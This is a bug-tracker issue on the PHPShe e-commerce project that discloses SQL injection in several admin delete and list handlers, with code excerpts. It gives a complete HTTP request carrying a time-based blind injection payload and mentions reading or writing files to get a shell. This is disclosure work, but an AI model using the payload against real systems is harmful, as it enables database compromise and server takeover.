17 Star 49 Fork 17

koyshe / phpshe

 / 详情

I found multiple SQL injection in the background.

待办的
创建于  
2018-10-18 23:52
  1. a vulnerability point
    输入图片说明

Look at the code

admin/user.php

	case 'del':
		pe_token_match();
		if ($db->pe_delete('user', array('user_id'=>is_array($_p_user_id) ? $_p_user_id : intval($_g_id)))) {
			pe_success('会员删除成功!');
		}
		else {
			pe_error('会员删除失败...');
		}
	break;

It is found that if one is deleted at a time, intval processing will be performed. If it is deleted in batches, the statement will be directly substituted, and the payload is constructed as follows.

POST /phpshe/admin.php?mod=user&act=del&token=d52aa9e11515574f774c9da971a4ae10 HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Referer: http://www.test.com/fiyocms/
Cookie: PHPSESSID=2j08sefmgofettspbuso00fs07
Connection: keep-alive
Upgrade-Insecure-Requests: 1

checkall=on&user_id%5B%5D=2') and if(1,sleep(5),1)#

输入图片说明

  1. Additional code for this type of situation

admin/userbank.php

	case 'del':
		pe_token_match();
		$userbank_id = is_array($_p_userbank_id) ? $_p_userbank_id : $_g_id;
		if ($db->pe_delete('userbank', array('userbank_id'=>$userbank_id))) {
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;

admin/userlevel.php

	case 'del':
		pe_token_match();
		$userlevel_id = is_array($_p_userlevel_id) ? $_p_userlevel_id : intval($_g_id);
		if ($db->pe_delete('userlevel', array('userlevel_id'=>$userlevel_id))) {
			cache_write('userlevel');
			userlevel_callback();
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;

admin/ad.php

	case 'del':
		pe_token_match();
		$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
		if ($db->pe_delete('ad', array('ad_id'=>$ad_id))) {
			cache_write('ad');
			pe_success('删除成功!');
		}
		else {
			pe_error('删除失败...');
		}
	break;
	//####################// 广告状态 //####################//
	case 'state':
		pe_token_match();
		$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
		if ($db->pe_update('ad', array('ad_id'=>$ad_id), array('ad_state'=>$_g_state))) {
			cache_write('ad');
			pe_success("操作成功!");
		}
		else {
			pe_error("操作失败...");
		}
	break;
		//####################// 广告列表 //####################//
	default :
		$_g_type && $sql_where .= " and `ad_type` = '{$_g_type}'";
		$_g_position && $sql_where .= " and `ad_position` = '{$_g_position}'";
		$sql_where .= " order by `ad_order` asc, `ad_id` desc";
		$info_list = $db->pe_selectall('ad', $sql_where, '*', array(20, $_g_page));
  1. Now I am looking for another example to verify.
    输入图片说明

If there is permission in the target environment, we can read the file or write the file to getshell.
输入图片说明

评论 (0)

p0desta。 创建了任务

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
PHP
1
https://gitee.com/koyshe/phpshe.git
git@gitee.com:koyshe/phpshe.git
koyshe
phpshe
phpshe

搜索帮助